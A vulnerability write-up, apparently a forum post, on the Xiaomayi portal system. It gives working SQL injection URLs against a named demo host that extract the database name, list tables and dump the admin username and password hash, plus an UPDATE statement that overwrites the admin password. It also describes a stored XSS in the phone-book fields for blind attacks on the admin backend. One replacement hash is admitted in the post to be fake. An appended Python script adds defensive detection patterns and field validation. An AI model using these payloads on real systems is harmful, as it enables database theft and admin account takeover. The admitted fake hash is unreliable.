Xiaomayi (小蚂蚁) Local Portal System: SQL Injection and XSS

Category: 漏洞时代 (Vulnerability Era)
Summary

1. SQL injection:

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and%20db_name()%3E0--

Returned database name: demo_xiaomayi_co
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 name from demo_xiaomayi_co.dbo.sysobjects where xtype=CHAR(85))>0--

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 username from Ant_admin)>0-- (dumps the account name)

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 password from Ant_admin)>0-- (dumps the password hash)

Replace the password hash with:
paLhASC5WX1ZUvaBeDN+lQ== ; after the swap, the admin user's password is weiwei0307

Damn it, this one turned out to be fake; you'll really have to find your own way..

update Ant_admin set password='ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRJSRcWlErUCQmUCxeWVlQUydZK19fXSNR' where Username='用户名'--
2. XSS

The XSS can be used for blind attacks on the admin backend.
The front-end XSS on the homepage is in the Yellow Pages phone-book publishing feature. First register a member account (these portal sites all have open registration); once registered, go to the page for publishing a Yellow Pages phone-book entry.

URL: http://demo.xiaomayi.co/Life/phonebookadd.aspx?action=edit

The phone and mobile fields here are not filtered on the backend at all; the front end only imposes a length limit. Capture the request, modify it, and submit.
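As an added example (not from the original post, and not the portal's own code), here is the defender-side view of both findings: a small Python script that flags the error-based MSSQL injection signatures used above (db_name(), sysobjects, "select top 1 ... from", a quote followed by and/or, a trailing "--") in the query strings of request-log lines, plus a server-side allowlist check for the phone-book fields so the length limit is not left to the browser. The log lines and the phone format are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures matching the error-based MSSQL injection style seen in this writeup.
SQLI_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"db_name\s*\(",          # db_name() probe
    r"\bsysobjects\b",        # table enumeration via sysobjects
    r"\bselect\s+top\s+\d+\b",  # "select top 1 ... from ..."
    r"'\s*(and|or)\b",        # quote-break followed by a boolean operator
    r"--\s*$",                # comment terminator at end of the value
)]

# Constructed sample of an access log: method, path+query, status.
SAMPLE_LOG = """\
GET /public/ajax.aspx?action=addcomparebuild&cname=Building+A 200
GET /public/ajax.aspx?action=addcomparebuild&cname=a'and%20db_name()%3E0-- 500
GET /public/ajax.aspx?action=addcomparebuild&cname=a'and%20(select%20top%201%20username%20from%20Ant_admin)%3E0-- 500
GET /Life/phonebookadd.aspx?action=edit 200
"""

def sqli_hits(url: str) -> dict:
    """Return {param: [matched patterns]} for each query parameter whose decoded value matches a signature."""
    hits = {}
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for v in values:  # parse_qs already percent-decodes the value
            matched = [p.pattern for p in SQLI_PATTERNS if p.search(v)]
            if matched:
                hits.setdefault(name, []).extend(matched)
    return hits

def scan_log(text: str) -> list:
    """Return (line_no, param, patterns) for every request line carrying a suspicious parameter."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 2:
            continue
        for param, pats in sqli_hits(parts[1]).items():
            findings.append((n, param, pats))
    return findings

# Assumed phone format: optional leading '+', then 6 to 20 digits or dashes.
PHONE_RE = re.compile(r"^\+?[0-9][0-9-]{5,19}$")

def valid_phone(value: str) -> bool:
    """Server-side allowlist for the phone/mobile fields; rejects markup and enforces length here."""
    return PHONE_RE.fullmatch(value) is not None

if __name__ == "__main__":
    for line_no, param, pats in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: parameter '{param}' matched {pats}")
```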
